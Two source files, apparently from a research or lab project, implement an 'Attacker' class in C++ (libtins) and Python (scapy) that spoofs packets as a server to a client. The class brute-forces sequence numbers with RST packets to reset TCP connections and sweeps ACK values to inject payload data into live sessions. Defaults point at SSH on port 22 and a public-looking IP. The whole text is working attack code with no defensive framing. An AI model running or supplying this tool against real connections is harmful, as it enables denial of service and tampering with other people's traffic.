File: cpp/Attack.cpp
#include "Attacker.h"
#include <iostream>
#include <tins/tins.h>

using namespace Tins;

void Attacker::TCP_dos() {
    PacketSender sender;
    for (int i = -seq_in_window; i < seq_window_size; ++i) {
        uint32_t seq = seq_in_window + i;

        IP packet = IP(server_ip, client_ip) / TCP(server_port, client_port);
        TCP &tcp = packet.rfind_pdu<TCP>();
        tcp.set_flag(TCP::RST, true);
        tcp.seq(seq);

        sender.send(packet, send_if_name);
    }
    std::cout << "^.^.^ Reset TCP connection ^.^.^" << std::endl;
}


void Attacker::TCP_inject() {
    PacketSender sender;
    std::string payload = " The attacker's payload ";
    
    for (int i = 0; i < 1; ++i) {
        for(int j=0; j<65535; ++j){
            int64_t seq_t = seq_in_window + i;
            int64_t ack_t = ack_in_window + j*ack_window_size;
            uint32_t seq = static_cast<uint32_t>(seq_t);
            uint32_t ack = static_cast<uint32_t>(ack_t);


            IP packet = IP(server_ip, client_ip) / TCP(server_port, client_port) / RawPDU(payload);
            TCP &tcp = packet.rfind_pdu<TCP>();
            tcp.set_flag(TCP::ACK, true);
            tcp.seq(seq);
            tcp.ack_seq(ack);

            sender.send(packet, send_if_name);
        }
    }
    std::cout << "^.^.^ Inject data into TCP connection ^.^.^" << std::endl;
}

File: python/attack.py
#!/usr/bin/python
from scapy.all import *
class Attacker:

    def __init__(self, client_ip='192.168.43.127', server_ip='124.70.155.59', client_port=65535, 
                 server_port=22, ack_in_window=0, seq_next=0, seq_in_window=0, seq_window_size=65535, 
                 send_if_name=['wlan0']):
        self.client_ip = client_ip
        self.client_port = client_port
        self.server_ip = server_ip
        self.server_port = server_port
        self.ack_in_window = ack_in_window
        self.seq_next = seq_next
        self.seq_in_window = seq_in_window
        self.seq_window_size = seq_window_size
        self.send_if_name = send_if_name

    def TCP_dos(self):
        print('^.^.^ Attack the TCP connection, reset the TCP connection ^.^.^')
        send_list = []

        for i in range(self.seq_window_size):
            sq = self.seq_in_window - i
            send_list.append(IP(src=self.server_ip, dst=self.client_ip) /
                             TCP(sport=self.server_port, dport=self.client_port, seq=sq, flags='R'))
        
        send(send_list, iface=self.send_if_name, verbose=False)

        return
    
    def TCP_inject(self):
        print('^.^.^ inject data into TCP connection ^.^.^')
        send_list = []

        ##### The TCP payload needs to be modified according to the data format of the target TCP connection #####
        payload = " " 
        
        for i in range(5):
            send_list.append(IP(src=self.server_ip, dst=self.client_ip) /
                                    TCP(sport=self.server_port, dport=self.client_port, seq=self.seq_next,
                                        ack=self.ack_in_window - i, flags='A') / payload)

        send(send_list, iface=self.send_if_name, verbose=False)

        return
    